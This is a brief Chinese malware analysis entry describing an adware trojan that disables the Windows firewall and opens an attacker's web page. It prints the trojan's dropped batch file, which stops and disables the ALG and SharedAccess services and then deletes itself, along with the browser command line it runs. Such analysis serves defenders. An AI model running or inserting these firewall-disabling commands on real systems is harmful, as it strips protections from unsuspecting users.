解析“IE广告木马53248”所释放病毒文件

病毒名称(中文)：IE广告木马53248

威胁级别：★☆☆☆☆

病毒类型：广告软件

病毒长度：53248

影响系统：Win9x WinMe WinNT Win2000 WinXP Win2003

病毒行为：

这是一个用VB编写的木马。它会自动关闭Windows 系统自带的防火墙，弹出病毒作者指定的网页。

1. 病毒会在临时文件下释放一个.bat的文件，C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Firewall.bat。文件内容为

@ECHO OFF
sc.exe stop alg
sc.exe stop SharedAccess
sc.exe config Alg start= disabled
sc.exe config SharedAccess start= disabled
DEL C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Firewall.bat
CLS
EXIT

这个.bat文件会关闭服务Application Layer Gateway Service和Windows Firewall/Internet Connection Sharing (ICS)，从而关闭系统自带的防火墙，然后设置这两个服务为禁用。

2. 启动iexplorer.exe，命令行"C:\Program Files\Internet Explorer\IEXPLORE.EXE" http://xxx.a***55.com/html/tongji.htm"，访问这个网址。

3. 程序会常驻内存，提供一系列的服务。